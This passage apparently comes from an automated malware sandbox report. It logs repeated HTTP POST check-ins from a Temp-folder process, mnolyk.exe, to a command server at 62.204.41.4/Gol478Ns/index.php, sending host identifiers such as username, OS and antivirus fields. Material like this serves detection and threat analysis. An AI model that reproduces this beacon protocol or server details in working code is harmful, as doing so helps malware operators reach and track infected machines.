                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:31.289877892 CET419INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:31 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            231192.168.2.44992662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:31.519366026 CET420OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:31.584067106 CET420INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:31 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            232192.168.2.44992762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:32.329981089 CET421OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:32.395512104 CET421INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:32 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            233192.168.2.44992862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:32.721034050 CET422OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:32.783979893 CET422INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:32 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            234192.168.2.44992962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:33.000267982 CET423OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:33.066776991 CET423INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:33 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            235192.168.2.44993062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:33.757164955 CET424OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:33.818859100 CET424INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:33 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            236192.168.2.44993162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:34.030036926 CET425OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:34.098907948 CET425INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:34 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            237192.168.2.44993262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:34.522912025 CET426OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:34.585572958 CET426INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:34 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            238192.168.2.44993362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:34.763684988 CET427OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:34.827692032 CET427INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:34 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            239192.168.2.44993462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:35.008002043 CET428OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:35.074621916 CET428INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:35 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            24192.168.2.44971962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:30.308623075 CET213OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:30.377908945 CET213INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:30 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            240192.168.2.44993562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:35.242769003 CET429OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:35.305485964 CET429INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:35 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            241192.168.2.44993662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:35.483540058 CET430OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:35.549552917 CET430INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:35 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            242192.168.2.44993762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:35.731318951 CET431OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:35.794156075 CET431INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:35 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            243192.168.2.44993862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:35.977194071 CET432OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:36.045663118 CET432INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:36 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            244192.168.2.44993962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:36.225912094 CET432OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:36.289037943 CET433INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:36 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            245192.168.2.44994062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:36.464020014 CET434OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:36.526894093 CET434INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:36 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            246192.168.2.44994162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:36.694907904 CET435OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:36.759859085 CET435INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:36 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            247192.168.2.44994262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:36.933202028 CET436OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:36.998570919 CET436INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:36 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            248192.168.2.44994362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:37.183501005 CET437OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:37.249094009 CET437INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:37 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            249192.168.2.44994462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:38:37.430399895 CET438OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:37.494013071 CET438INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:37 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            25192.168.2.44972062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:30.557563066 CET214OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
